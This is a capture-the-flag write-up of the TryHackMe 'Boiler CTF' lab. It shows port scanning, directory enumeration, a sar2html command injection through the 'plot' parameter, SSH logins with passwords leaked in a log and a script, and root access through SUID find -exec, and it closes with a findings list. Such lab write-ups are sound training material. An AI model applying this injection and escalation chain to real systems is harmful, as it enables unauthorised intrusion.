地址:https://tryhackme.com/r/room/boilerctf2
It's the second CTF I've done in tryhackme.com. Since I spend much more time on reading the learning material than practice, I really take every oppertunity seriously to practice in the CTF. A write-up was recorded for writing down my thinking and confusing in the process.
First Stage: Active reconnoition
Because it's a ctf enviroment, so I skipped the passive reconnoition searching information publicly. What services are provided on the server? NMap is a good tool to figure them out.
Command: nmap -A -v 10.10.50.255
Question: The results does not contain port 55007 which a SSH service listens on. Port range parameters is appended for searching each port.
nmap -A -v -p1-65535 10.10.50.255
This time we got four ports with service listening on with a much slower speed: 80, 10000, 21, 55007. Maybe there would be better/faster ways to make inspecting.
The service information on each port is listed below:
There are 2 http servers depolying on 80 and 10000, one is a http and the other is https.
Also there's a FTP server listening on 21.
And SSH service is working with port 55007.
Now can we make further recononition based on results of ports scanning?
FTP server 21
It has already mentioned the FTP is an anonymous server , so we can try to login and inspect.
root@ip-10-10-27-76:~# ftp 10.10.50.255 Connected to 10.10.50.255. 220 (vsFTPd 3.0.3) Name (10.10.50.255:root): anonymous 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp>
Ok, successfully login with anonymous. Now I can try to find is there any files avaliable.
ftp> ls -la 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 ftp ftp 4096 Aug 22 2019 . drwxr-xr-x 2 ftp ftp 4096 Aug 22 2019 .. -rw-r--r-- 1 ftp ftp 74 Aug 21 2019 .info.txt 226 Directory send OK. ftp> get .info.txt local: .info.txt remote: .info.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for .info.txt (74 bytes). 226 Transfer complete. 74 bytes received in 0.00 secs (127.4526 kB/s)
A hidden file named .info.txt was found, certainly it will be downloaded and the content of it would be viewed.
Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!
When the content is displayed I doubt it is a kind of simple encryption like rotating. Well hold on let's move our sight to other service. (Because I need use coding to decode them now).
HTTP server 80
Let's try to get some information from this server. Ususally following such steps:
robots.txt
wget http://10.10.50.255/robots.txt
After downloading successfully, the file is opend:
What's the hell of the last line which holding strange digits? Surely it's a kind of encryption. Let's deal with them later.
sitemap.xml
Unfortunately, sitemap.xml does not exist under this web server. Wget failed to download it.
directory searching
Gobuster is a good tool to check directories with a dictionary containing possible directory names.
gobuster dir --url=10.10.50.255 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
Following sub-directories were found:
Let's go further into manual/joomla (/server-status return 403, it could be skipped then, and manual usually contains information for usage, it's not valuable for further hack usually).
/manual/
/joomla/
Note: _test is not included in the dictionary, I added it manually.
Further more, we can even try to fetch the default files in each directory, but it would be much more work to do so just hold the job here.
HTTP server 10000
When I try to recononite the server, a failure was report like below:
I think it failed because of invalid certificate, and I'm not trying to investigate it deeply now.
SSH 55007
Without any avaliable account and password, I don't think any information could be caught currently.
OK, let's terminate the recononition and go on the next stage.
Second Stage : Find vulerable point
Compare the content in robots.txt and the sub directory result searched by gobuster, they are completely different. So we can guess that the robots.txt is misconfigured.
But there's some strange digits is listed in the robots.txt, let's try to find what it really is.
At first glance, I guess they are ascii bytes expressed in digits. So Let's turn it back to ascii now.
int asc_texts[] = {
79,84,108,105,77,68,89,50,77,71,78, 107, 79, 84, 86, 104,
90, 71, 86, 104, 77, 122, 73, 51, 89, 122, 85, 48, 77,
84, 103, 121, 89, 109, 70, 104, 78, 84, 69, 49, 79, 68, 81, 75
};
for (int i = 0; i < sizeof(asc_texts) / sizeof(int); i++) {
printf("%c", asc_texts[i]);
}
printf("\n");
result: OTliMDY2MGNkOTVhZGVhMzI3YzU0MTgyYmFhNTE1ODQK
Well, it must be base64 encoded for ... it looks like base64 encoded.
With burpSuite Decoder, we can easyly decode it to:
Well, the text looks too much like a hash. Let's search it in bing.com and got the reverse string: kidding.
Unfortunately, http://10.10.50.255/kidding does not exist eigher, like other dictory listed in the robots.txt.
Well, moving to joomla, the dictories named tests/_test/_files/tmp are usually be intersed in. Let's check them.
Well, the tests contains some source code and sql files stored in unit, they are really invaluable for hackers.
When visiting the _files, I got such string. Looks like base64, after twice decoding as base64, such result is showed:
Whopsie daisy? What the hell it is! I don't know,maybe it's a key, a user name, or something else.
Nothing was found in directory tmp.
Now we try to explore in directory _test. What's sar2html?
Well, SarHtml is a reverse command shell!!! It's obviously a open gate to those hackers. Let's step in to check where it leaks.
Visit: http://10.10.50.255/joomla/_test/index.php?plot=;ls -la
It contains a file named log.txt. Let's download and view it.
Aug 20 11:16:26 parrot sshd[2443]: Server listening on 0.0.0.0 port 22.
Aug 20 11:16:26 parrot sshd[2443]: Server listening on :: port 22.
Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: superduperp@$$
Aug 20 11:16:35 parrot sshd[2451]: pam_unix(sshd:session): session opened for user pentest by (uid=0)
Aug 20 11:16:36 parrot sshd[2466]: Received disconnect from 10.10.170.50 port 49824:11: disconnected by user
Aug 20 11:16:36 parrot sshd[2466]: Disconnected from user pentest 10.10.170.50 port 49824
Aug 20 11:16:36 parrot sshd[2451]: pam_unix(sshd:session): session closed for user pentest
Aug 20 12:24:38 parrot sshd[2443]: Received signal 15; terminating.
From the content it must be a log of SSH login. And fortunately, we got a username/password from the log:
basterd: #pass: superduperp@$$
Well, we got a valid username/password pair to SSH service then. So Let's go to SSH service, and try to login. [Since the virtual machine is expired, I request a new virtual machine but the IP is chaned now]
root@ip-10-10-195-217:~# ssh basterd@10.10.207.217 -p55007
basterd@10.10.207.217's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
8 packages can be updated.
8 updates are security updates.
Last login: Thu Aug 22 12:29:45 2019 from 192.168.1.199
$ ls -la
total 16
drwxr-x--- 3 basterd basterd 4096 Aug 22 2019 .
drwxr-xr-x 4 root root 4096 Aug 22 2019 ..
-rwxr-xr-x 1 stoner basterd 699 Aug 21 2019 backup.sh
-rw------- 1 basterd basterd 0 Aug 22 2019 .bash_history
drwx------ 2 basterd basterd 4096 Aug 22 2019 .cache
$
Loggin succesfuly and a file named backup.sh was found here, lets view the file.
$ cat ./backup.sh
REMOTE=1.2.3.4
SOURCE=/home/stoner
TARGET=/usr/local/backup
LOG=/home/stoner/bck.log
DATE=`date +%y\.%m\.%d\.`
USER=stoner
#superduperp@$$no1knows
ssh $USER@$REMOTE mkdir $TARGET/$DATE
OMG, there's a username in the file with it's passwod commented:
stoner: superduperp@$$no1knows
Now we got another valid username.
3rd Stage: Elevate privileges
Let's try can baster run with root permission.
$ sudo -l
[sudo] password for basterd:
Sorry, user basterd may not run sudo on Vulnerable.
But basterd has no permission to run with root privilege. We can do no more action with the account so let's try the new suer named stoner.
Well, stoner can run certain commands with root permission. This require some knowledge about sudo configuration. Let's extract what commands could be run with high permission by stoner.
find / -user root -perm -4000
stoner@Vulnerable:~$ find / -user root -perm -4000
/bin/su
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping6
/bin/ping
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/apache2/suexec-custom
/usr/lib/apache2/suexec-pristine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/find
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/newuidmap
find: \u2018/proc/1517/task/1517/fd/6\u2019: No such file or directory
find: \u2018/proc/1517/task/1517/fdinfo/6\u2019: No such file or directory
find: \u2018/proc/1517/fd/5\u2019: No such file or directory
find: \u2018/proc/1517/fdinfo/5\u2019: No such file or directory
Look into the results that stoner could run with root privilege, find command is useful for we can call -exec to execute command when find a file.
In the CTF, root.txt is required to be found. Let's try:
stoner@Vulnerable:~$ find / -name root.txt
/root/root.txt
stoner@Vulnerable:~$ find / -name root.txt -exec cat '{}' \;
It wasn't that hard, was it?
Now we found the content of the root.txt.
4th stage: report
a. The first vulerable point is the sar2html in _test directory, it allows a remote command execution there.
b. username/passwords should not saved in the log.txt directly.
c. username/passwords should not saved in the source code(backup.sh)
d. stoner was configured to use find with root permission.